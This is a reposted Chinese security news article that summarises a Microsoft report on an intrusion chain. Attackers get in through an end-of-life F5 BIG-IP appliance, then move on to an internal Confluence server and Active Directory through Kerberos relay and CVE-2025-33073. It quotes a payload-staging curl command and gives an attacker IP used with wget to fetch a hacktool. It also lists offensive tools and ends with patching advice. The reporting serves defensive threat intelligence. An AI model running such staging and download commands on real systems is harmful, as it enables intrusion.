文章总结： 攻击者利用已终止支持的F5BIG-IP设备漏洞获取SSH访问权限，通过内部网络横向移动发现未修补的Confluence服务器并实现域控突破。关键发现包括CVE-2025-53521被重新分类为9.8分RCE漏洞、攻击链涉及Nmap/GoWitness等工具集、利用Kerberos中继攻击域基础设施。可操作建议包括及时修补边缘设备、强化内部服务访问控制、监控云环境隐性信任边界。 综合评分： 85 文章分类： 漏洞分析,渗透测试,内网渗透,应急响应,威胁情报

黑客利用F5 BIG-IP获取SSH访问并转向Linux网络

会杀毒的单反狗 会杀毒的单反狗

爱拍照的老李

2026年5月24日 09:00 湖北

在小说阅读器读本章

去阅读

导读

攻击者正在积极利用已过时的F5 BIG-IP设备，以获得对企事业网络的未经授权的SSH访问权限，利用被攻破的设备作为发起复杂多阶段入侵活动的跳板，最终目标是针对Active Directory基础设施。

Microsoft 于2026年5月22日披露了完整的攻击链，记录了单个被攻破的边缘设备如何蔓延至域级攻破，涵盖Linux主机、内部Atlassian Confluence服务器以及Windows认证系统。

调查人员追踪到威胁组织的初始SSH访问，访问了运行15.1.201000版本的Azure托管的F5 BIG-IP虚拟版（VE），该版本通常通过Azure ARM模板和Terraform模块配置的云部署版本。

该特定版本于2024年12月31日终止支持，未被补丁且在被攻破时未获支持。

F5 BIG-IP 获取 SSH 访问

这一时间点与更广泛的F5威胁格局紧密相符。2025年8月，一个复杂的国家级威胁组织入侵了F5内部系统，窃取了BIG-IP产品源代码以及未公开、未修补漏洞的细节。

攻击流程（来源：Microsoft）

该漏洞由F5于2025年10月公开披露，已被关联到BRICKSTORM恶意软件家族，该家族与针对软件和云供应商的活动有关，目的是收集源代码和凭证，用于供应链下游利用。

加剧风险的是，F5 BIG-IP 访问政策管理器（APM）中的关键漏洞CVE-2025-53521最初于2025年10月被披露为拒绝服务漏洞。不过，该漏洞于2026年3月被重新分类为远程代码执行（RCE）漏洞，CVSS评分为9.8。

CISA于2026年3月27日将其CVE-2025-53521纳入已知被利用漏洞（KEV）目录，Shadowserver基金会当时报告全球有超过17,000个易受攻击的IP。荷兰国家网络安全中心也独立证实该漏洞在实际中被积极滥用。

一旦通过被攻破的F5设备建立SSH访问，威胁行为者使用拥有无限制sudo权限的特权账户进行身份验证，并在整个入侵过程中保持手动键盘访问，且未部署显式持久化机制。

威胁活动（来源：Microsoft）

攻击者立即利用分层工具包发起了激进侦察：

• Nmap配备自动化shell脚本，用于跨内部子网进行横向和垂直网络扫描
• GoWitness 将截图捕获所有发现的 HTTP/HTTPS 服务
• testssl 用于探查 SSL/TLS 的弱点并识别潜在的协议降级路径
• 一个自定义ELF二进制文件，检测为HackTool：Linux/MalPack.B，从via      下载以枚举网页应用访问控制206.189.27[.]39:8888wget
• 尝试使用标准的基于NTLM的横向移动工具，包括enum4linux、kerbrute、responder、Smbclient、netexec和针对Windows基础设施的尝试最初未能成功。

在侦察过程中，攻击者发现了一台内部托管的Atlassian Confluence服务器，存在未修补的远程代码执行漏洞。

Microsoft表示该服务器不面向互联网，只有在攻击者获得内部网络访问权限后，才能访问该网络，而这在混合和云环境中存在隐性信任边界时是关键风险。

当Confluence主机上的实时保护（RTP）阻止了直接有效载荷的传递时，攻击者通过在初始Linux主机上搭建Python的FTP服务器，通过匿名FTP分阶段并传输有效载荷进行调整：

bashcurl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5

攻破Confluence后，攻击者提取了凭证并将其武器化，用于针对域基础设施的Kerberos中继攻击。

其中包括利用 CVE-2025-33073，这是 RedTeam 渗透测试和 Synacktiv 研究人员于 2025 年 6 月披露的 Windows SMB NTLM 反射漏洞。

CVE-2025-33073 取消了在未强制 SMB 签名的情况下，任何已加入域的机器实现 SYSTEM 认证 RCE 的先决条件，只需网络访问和有效的域凭证。

技术报告：

《从边缘设备到企业入侵：通过F5和Confluence实现多阶段Linux入侵》

From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence

新闻链接：

Hackers Exploit F5 BIG-IP to Gain SSH Access and Pivot Into Linux Networks

扫码关注

军哥网络安全读报

讲述普通人能听懂的安全故事

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：爱拍照的老李 会杀毒的单反狗 会杀毒的单反狗《黑客利用F5 BIG-IP获取SSH访问并转向Linux网络》